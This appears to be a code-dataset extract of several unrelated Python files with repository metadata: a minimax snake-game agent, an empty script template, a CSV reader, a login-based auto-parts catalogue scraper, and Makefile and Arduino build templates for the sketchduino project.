def maxValue(self, gameState, index, depth, a, b):
if gameState.is_end or depth >= DEPTH:
return [gameState.evaluationFunction(), None]
v = -10000
ac = Action.actlist[0]
for action in Action.actlist:
next = gameState.generateSuccessor(index, action)
value = self.value(next, index+1, depth, a, b)
if value > v:
v = value
ac = action
if v >= b:
return [v, ac]
a = max(a, v)
return [v, ac]
def minValue(self, gameState, index, depth, a, b):
if gameState.is_end:
return [gameState.evaluationFunction(), None]
v = 10000
ac = Action.actlist[0]
for action in Action.actlist:
next = gameState.generateSuccessor(index, action)
value = self.value(next, index+1, depth, a, b)
if value < v:
v = value
ac = action
if v <= a:
return [v, ac]
b = min(b, v)
return [v, ac]
def get_action(self, index):
return self.maxValue(GameState(self.obs), index-2, 0, -10000, 10000)[1]
def my_controller(observation, action_space, is_act_continuous=False):
ac = Action.mapAct[MinimaxAgent(observation).get_action(observation['controlled_snake_index'])]
    return [ac] | none | 1 | 3.439826 | 3 |
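An easy-to-miss detail in the minimax record above is that Action.go treats the board as a torus: the modulo arithmetic makes a move off one edge re-enter from the opposite edge. A quick check against the Action class defined above (the board sizes are arbitrary):

# (row, col) positions on a 3-row, 4-column board
print(Action.go((0, 0), (-1, 0), 3, 4))  # (2, 0): moving "up" from row 0 wraps to the bottom row
print(Action.go((0, 3), (0, 1), 3, 4))   # (0, 0): moving "right" off the last column wraps to column 0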
public_html/python/Empty_Python_Page.py | Asher-Simcha/help | 0 | 10358 |
#!/usr/bin/python
# Title:
# Author:
# Additional Authors:
# Filename:
# Description:
# Version:
# Date:
# Last Modified:
# Location_of_the_Video:
# Meta_data_for_YouTube:
# Web_Site_For_Video:
# Start Your Code Here
#EOF
 | #!/usr/bin/python
# Title:
# Author:
# Additional Authors:
# Filename:
# Description:
# Version:
# Date:
# Last Modified:
# Location_of_the_Video:
# Meta_data_for_YouTube:
# Web_Site_For_Video:
# Start Your Code Here
#EOF | en | 0.564956 | #!/usr/bin/python # Title: # Author: # Additional Authors: # Filename: # Description: # Version: # Date: # Last Modified: # Location_of_the_Video: # Meta_data_for_YouTube: # Web_Site_For_Video: # Start Your Code Here #EOF | 1.822273 | 2 |
Python/first_flask_project/utilities/file_reader.py | maxxxxxdlp/code_share | 0 | 10359 |
def read_csv(root, file_name, keys):
with open('{root}private_static/csv/{file_name}.csv'.format(root=root, file_name=file_name)) as file:
data = file.read()
    lines = data.split("\n")
    # Skip the header row (i == 0) and any trailing empty line left by a final newline.
    return [dict(zip(keys, line.split(','))) for i, line in enumerate(lines) if i != 0 and line]
| def read_csv(root, file_name, keys):
with open('{root}private_static/csv/{file_name}.csv'.format(root=root, file_name=file_name)) as file:
data = file.read()
    lines = data.split("\n")
    # Skip the header row (i == 0) and any trailing empty line left by a final newline.
    return [dict(zip(keys, line.split(','))) for i, line in enumerate(lines) if i != 0 and line] | none | 1 | 3.108223 | 3 |
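The read_csv above splits on raw newlines and commas, which breaks on quoted fields. An equivalent sketch using the standard library's csv module; the private_static/csv layout mirrors the path assumed above, and read_csv_std is a hypothetical name, not part of the project:

import csv
from pathlib import Path

def read_csv_std(root, file_name, keys):
    path = Path(root) / "private_static" / "csv" / f"{file_name}.csv"
    with path.open(newline="") as f:
        reader = csv.reader(f)
        next(reader, None)  # skip the header row
        return [dict(zip(keys, row)) for row in reader]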
semester3/oop/lab3/parser/client/MasterService/client.py | no1sebomb/University-Labs | 0 | 10360 |
# coding=utf-8
from parser.client import *
from parser.client.ResponseItem import *
with (Path(__file__).resolve().parent / "config.json").open("rt") as siteConfigFile:
SITE_CONFIG = json.load(siteConfigFile)
class MasterService(Client):
class Link:
main = "https://steering.com.ua/"
login = "https://steering.com.ua/login"
search = "https://steering.com.ua/catalog?oe={}"
name = "masterservice"
def __init__(self):
super().__init__()
self.username = SITE_CONFIG["username"]
self.password = SITE_CONFIG["password"]
start_time = time()
self.connected, self.logged = self.sign_in()
self.login_time = "%.3f s" % (time() - start_time)
def get_info(self, article, brand):
if self.connected and self.logged:
search_request = self.session.get(self.Link.search.format(article))
if search_request.status_code != 200:
            return self.response_brand(2, "Помилка з'єднання")  # "Connection error"
html_tree = html.fromstring(search_request.text)
items = html_tree.xpath('//table[@class="vi-table vi-responsive"]/tr')
if not items:
            return self.response_brand(1, "Артикул не знайдено")  # "Article not found"
for item in items:
brand_expr = './/td[@data-label=""]/a[@rel="nofollow"]/text()'
try:
item_brand = self.clear(item.xpath(brand_expr)[0])
except IndexError:
try:
item_brand = self.clear(item.xpath('.//td[@data-label=""]/text()')[1])
except IndexError:
item_brand = ""
if self.compare(brand, item_brand):
break
else:
                return self.response_brand(1, "Бренд не знайдено")  # "Brand not found"
item_link = item.xpath('.//td/div/a/@href')[0]
item_info_request = self.session.get(item_link)
if item_info_request.status_code != 200:
return self.response_brand(2, "Помилка з'єднання")
item_info_tree = html.fromstring(item_info_request.text)
item_info = item_info_tree.xpath('//table[@class="vi-item-table"]//td/text()')
item = ResponseItem(
article=self.clear(item_info[1]),
brand=item_brand,
name="".join(item_info_tree.xpath('//h1[@class="vi-item-name"]/span/text()')[:-1]),
desc=self.clear(item_info[9])
)
try:
item_price = self.clear(item_info_tree.xpath('//span[@class="value"]/span/text()')[0]).replace(" ", "")
except IndexError:
item_price = "0"
item["price"] = "%.2f UAH" % float(item_price)
try:
item_stocks = item_info_tree.xpath('//td[@class="product-nalichie-table"]/table/tr/td/text()')[1:]
except IndexError:
pass
else:
name = None
for number, value in enumerate(item_stocks):
if number % 2:
item["stocks"].append(
{"name": name,
"quantity": self.clear(value),
"term": None}
)
else:
name = self.clear(value)
try:
image_link = self.Link.main[:-1] + item_info_tree.xpath('//div[@class="fotorama"]/img/@src')[0]
except IndexError:
pass
else:
item["image"] = self.get_image(image_link, image_id=image_link.split("/")[-1].split(".")[0])
car_using = item_info_tree.xpath('//div[@class="row vi-prim-auto"]//ul[@class="prim-car"]/li')
for car in car_using:
car_name = self.clear(car.xpath('./span/text()')[0])
car_models = car.xpath('./ul/li')
for car_model in car_models:
model_name = self.clear(car_model.xpath('./span/text()')[0])
model_vars = car_model.xpath('./ul/li/text()')
for model_var in model_vars:
try:
item["using"][car_name].append(model_name + " " + self.clear(model_var))
except KeyError:
item["using"][car_name] = [model_name + " " + self.clear(model_var)]
oe = item_info_tree.xpath('//div[@class="row vi-prim-auto"]//div[@class="car-oe"]//dd[@class="content"]')[0]
oe_codes = oe.xpath("./a/text()")
for oe_code in oe_codes:
try:
item["cross"][""].append(self.clear(oe_code))
except KeyError:
item["cross"][""] = [self.clear(oe_code)]
analogs_table = item_info_tree.xpath('//table[@class="products-list vi-table vi-responsive"]')[0]
analogs = analogs_table.xpath('.//tr[@class="even" or @class="odd"]')
for analog in analogs:
analogs_name_list = analog.xpath('.//a[@class="name"]/span/text()')
try:
analog_brand = self.clear(analog.xpath('.//div[@class="vendor"]/span[@class="value"]/text()')[0])
except IndexError:
analog_brand = ""
analog_item = ResponseItem(
article=self.clear(analogs_name_list[-1]),
brand=analog_brand,
name=self.clear("".join(analogs_name_list[:-1]))
)
analog_stocks = analog.xpath('.//td[@class="storage"]//td[not(contains(@class, "title_sklad"))]/text()')
stock_name = ""
for number, stock in enumerate(analog_stocks[1:]):
if number % 2:
analog_item["stocks"].append(
{"name": stock_name,
"quantity": self.clear(stock),
"term": None}
)
else:
stock_name = self.clear(stock).replace(":", "")
image_link = self.Link.main[:-1] + analog.xpath('.//td[@data-label="Фото"]//img/@src')[0]
analog_item["image"] = self.get_image(image_link, image_id=image_link.split("/")[-1].split(".")[0])
item.set_analog(analog_item)
return self.response_brand(0, "OK", item)
elif self.connected:
            return self.response_brand(3, "Помилка авторизації")  # "Authorization error"
else:
return self.response_brand(2, "Помилка з'єднання")
def sign_in(self):
main_page_request = self.session.get(self.Link.main)
if main_page_request.status_code != 200:
return 0, 0
        login_request = self.session.post(self.Link.login, data={"login": self.username, "password": self.password},
headers={"Content-Type": "application/x-www-form-urlencoded"})
if login_request.status_code == 200:
return 1, 1
else:
return 1, 0
| # coding=utf-8
from parser.client import *
from parser.client.ResponseItem import *
with (Path(__file__).resolve().parent / "config.json").open("rt") as siteConfigFile:
SITE_CONFIG = json.load(siteConfigFile)
class MasterService(Client):
class Link:
main = "https://steering.com.ua/"
login = "https://steering.com.ua/login"
search = "https://steering.com.ua/catalog?oe={}"
name = "masterservice"
def __init__(self):
super().__init__()
self.username = SITE_CONFIG["username"]
self.password = SITE_CONFIG["password"]
start_time = time()
self.connected, self.logged = self.sign_in()
self.login_time = "%.3f s" % (time() - start_time)
def get_info(self, article, brand):
if self.connected and self.logged:
search_request = self.session.get(self.Link.search.format(article))
if search_request.status_code != 200:
            return self.response_brand(2, "Помилка з'єднання")  # "Connection error"
html_tree = html.fromstring(search_request.text)
items = html_tree.xpath('//table[@class="vi-table vi-responsive"]/tr')
if not items:
            return self.response_brand(1, "Артикул не знайдено")  # "Article not found"
for item in items:
brand_expr = './/td[@data-label=""]/a[@rel="nofollow"]/text()'
try:
item_brand = self.clear(item.xpath(brand_expr)[0])
except IndexError:
try:
item_brand = self.clear(item.xpath('.//td[@data-label=""]/text()')[1])
except IndexError:
item_brand = ""
if self.compare(brand, item_brand):
break
else:
                return self.response_brand(1, "Бренд не знайдено")  # "Brand not found"
item_link = item.xpath('.//td/div/a/@href')[0]
item_info_request = self.session.get(item_link)
if item_info_request.status_code != 200:
return self.response_brand(2, "Помилка з'єднання")
item_info_tree = html.fromstring(item_info_request.text)
item_info = item_info_tree.xpath('//table[@class="vi-item-table"]//td/text()')
item = ResponseItem(
article=self.clear(item_info[1]),
brand=item_brand,
name="".join(item_info_tree.xpath('//h1[@class="vi-item-name"]/span/text()')[:-1]),
desc=self.clear(item_info[9])
)
try:
item_price = self.clear(item_info_tree.xpath('//span[@class="value"]/span/text()')[0]).replace(" ", "")
except IndexError:
item_price = "0"
item["price"] = "%.2f UAH" % float(item_price)
try:
item_stocks = item_info_tree.xpath('//td[@class="product-nalichie-table"]/table/tr/td/text()')[1:]
except IndexError:
pass
else:
name = None
for number, value in enumerate(item_stocks):
if number % 2:
item["stocks"].append(
{"name": name,
"quantity": self.clear(value),
"term": None}
)
else:
name = self.clear(value)
try:
image_link = self.Link.main[:-1] + item_info_tree.xpath('//div[@class="fotorama"]/img/@src')[0]
except IndexError:
pass
else:
item["image"] = self.get_image(image_link, image_id=image_link.split("/")[-1].split(".")[0])
car_using = item_info_tree.xpath('//div[@class="row vi-prim-auto"]//ul[@class="prim-car"]/li')
for car in car_using:
car_name = self.clear(car.xpath('./span/text()')[0])
car_models = car.xpath('./ul/li')
for car_model in car_models:
model_name = self.clear(car_model.xpath('./span/text()')[0])
model_vars = car_model.xpath('./ul/li/text()')
for model_var in model_vars:
try:
item["using"][car_name].append(model_name + " " + self.clear(model_var))
except KeyError:
item["using"][car_name] = [model_name + " " + self.clear(model_var)]
oe = item_info_tree.xpath('//div[@class="row vi-prim-auto"]//div[@class="car-oe"]//dd[@class="content"]')[0]
oe_codes = oe.xpath("./a/text()")
for oe_code in oe_codes:
try:
item["cross"][""].append(self.clear(oe_code))
except KeyError:
item["cross"][""] = [self.clear(oe_code)]
analogs_table = item_info_tree.xpath('//table[@class="products-list vi-table vi-responsive"]')[0]
analogs = analogs_table.xpath('.//tr[@class="even" or @class="odd"]')
for analog in analogs:
analogs_name_list = analog.xpath('.//a[@class="name"]/span/text()')
try:
analog_brand = self.clear(analog.xpath('.//div[@class="vendor"]/span[@class="value"]/text()')[0])
except IndexError:
analog_brand = ""
analog_item = ResponseItem(
article=self.clear(analogs_name_list[-1]),
brand=analog_brand,
name=self.clear("".join(analogs_name_list[:-1]))
)
analog_stocks = analog.xpath('.//td[@class="storage"]//td[not(contains(@class, "title_sklad"))]/text()')
stock_name = ""
for number, stock in enumerate(analog_stocks[1:]):
if number % 2:
analog_item["stocks"].append(
{"name": stock_name,
"quantity": self.clear(stock),
"term": None}
)
else:
stock_name = self.clear(stock).replace(":", "")
image_link = self.Link.main[:-1] + analog.xpath('.//td[@data-label="Фото"]//img/@src')[0]
analog_item["image"] = self.get_image(image_link, image_id=image_link.split("/")[-1].split(".")[0])
item.set_analog(analog_item)
return self.response_brand(0, "OK", item)
elif self.connected:
return self.response_brand(3, "Помилка авторизації")
else:
return self.response_brand(2, "Помилка з'єднання")
def sign_in(self):
main_page_request = self.session.get(self.Link.main)
if main_page_request.status_code != 200:
return 0, 0
        login_request = self.session.post(self.Link.login, data={"login": self.username, "password": self.password},
headers={"Content-Type": "application/x-www-form-urlencoded"})
if login_request.status_code == 200:
return 1, 1
else:
return 1, 0 | en | 0.644078 | # coding=utf-8 | 2.412715 | 2 |
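The scraper above is built entirely on lxml XPath queries over server-rendered HTML. A tiny standalone illustration of the same extraction style, assuming lxml is installed (the markup is a made-up fragment, not the live site's):

from lxml import html

fragment = '''
<table class="vi-table vi-responsive">
  <tr><td data-label="">ACME</td><td data-label="">A-123</td></tr>
</table>
'''
tree = html.fromstring(fragment)
print(tree.xpath('//td[@data-label=""]/text()'))  # ['ACME', 'A-123']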
sketchduino/template.py | rodrigopmatias/sketchduino | 0 | 10361 | # -*- coding: utf-8 -*-
'''
Copyright 2012 <NAME> <<EMAIL>>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
templates = {
'static_link': '''
\t@$(AR) rcs %(lib)s %(obj)s
\t@echo " [\033[33m\033[1mAR\033[0m] - \033[37m\033[1m%(obj)s\033[0m to \033[37m\033[1m%(lib)s\033[0m"''',
'c_obj_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'asm_obj_ruler': '''%(obj)s: %(source)s
\t@$(AS) $(ASFLAGS) -o %(obj)s %(source)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mAS\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'c_asm_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_obj_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_asm_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'avr-main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <avr/sleep.h>
int main(void) {
for(;;)
sleep_mode();
return 0;
}''',
'main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <Arduino.h>
/**
* Setup of the firmware
**/
void setup() {
}
/**
* Schedule events for firmware program
**/
void loop() {
delay(250);
}''',
'Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Defines of Arduino
ARDUINO_HOME=%(sdk_home)s
ARDUINO_CORE=$(ARDUINO_HOME)/hardware/arduino/cores
ARDUINO_VARIANT=$(ARDUINO_HOME)/hardware/arduino/variants/%(variant)s
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I$(ARDUINO_CORE)/arduino -I$(ARDUINO_VARIANT) -I$(ARDUINO_CORE) -I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
ARDUINO=%(sdk_version)s
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -MMD -DARDUINO=$(ARDUINO) \\
-fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
OBJ=%(obj_dep)s
CORE_OBJ=%(core_obj_dep)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
CORE_LIB=binary/core.a
LIB_DEPS=%(lib_deps)s
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-C --mcu=$(MCU)
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(CORE_LIB) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(CORE_LIB) $(LIB_DEPS) -o $(AOUT)
$(CORE_LIB): $(CORE_OBJ)%(core_ruler)s
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
%(core_asm_rulers)s
%(core_obj_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\trm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
''',
'avr-Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
ASM=%(asm_dep)s
OBJ=%(obj_dep)s
LIB_DEPS=%(lib_deps)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-A
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(LIB_DEPS) -o $(AOUT)
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\t@rm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
'''
}
| # -*- coding: utf-8 -*-
'''
Copyright 2012 <NAME> <<EMAIL>>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
templates = {
'static_link': '''
\t@$(AR) rcs %(lib)s %(obj)s
\t@echo " [\033[33m\033[1mAR\033[0m] - \033[37m\033[1m%(obj)s\033[0m to \033[37m\033[1m%(lib)s\033[0m"''',
'c_obj_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'asm_obj_ruler': '''%(obj)s: %(source)s
\t@$(AS) $(ASFLAGS) -o %(obj)s %(source)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mAS\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'c_asm_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_obj_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_asm_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'avr-main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <avr/sleep.h>
int main(void) {
for(;;)
sleep_mode();
return 0;
}''',
'main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <Arduino.h>
/**
* Setup of the firmware
**/
void setup() {
}
/**
* Schedule events for firmware program
**/
void loop() {
delay(250);
}''',
'Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Defines of Arduino
ARDUINO_HOME=%(sdk_home)s
ARDUINO_CORE=$(ARDUINO_HOME)/hardware/arduino/cores
ARDUINO_VARIANT=$(ARDUINO_HOME)/hardware/arduino/variants/%(variant)s
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I$(ARDUINO_CORE)/arduino -I$(ARDUINO_VARIANT) -I$(ARDUINO_CORE) -I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
ARDUINO=%(sdk_version)s
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -MMD -DARDUINO=$(ARDUINO) \\
-fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
OBJ=%(obj_dep)s
CORE_OBJ=%(core_obj_dep)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
CORE_LIB=binary/core.a
LIB_DEPS=%(lib_deps)s
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-C --mcu=$(MCU)
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(CORE_LIB) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(CORE_LIB) $(LIB_DEPS) -o $(AOUT)
$(CORE_LIB): $(CORE_OBJ)%(core_ruler)s
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
%(core_asm_rulers)s
%(core_obj_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\trm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
''',
'avr-Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
ASM=%(asm_dep)s
OBJ=%(obj_dep)s
LIB_DEPS=%(lib_deps)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-A
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
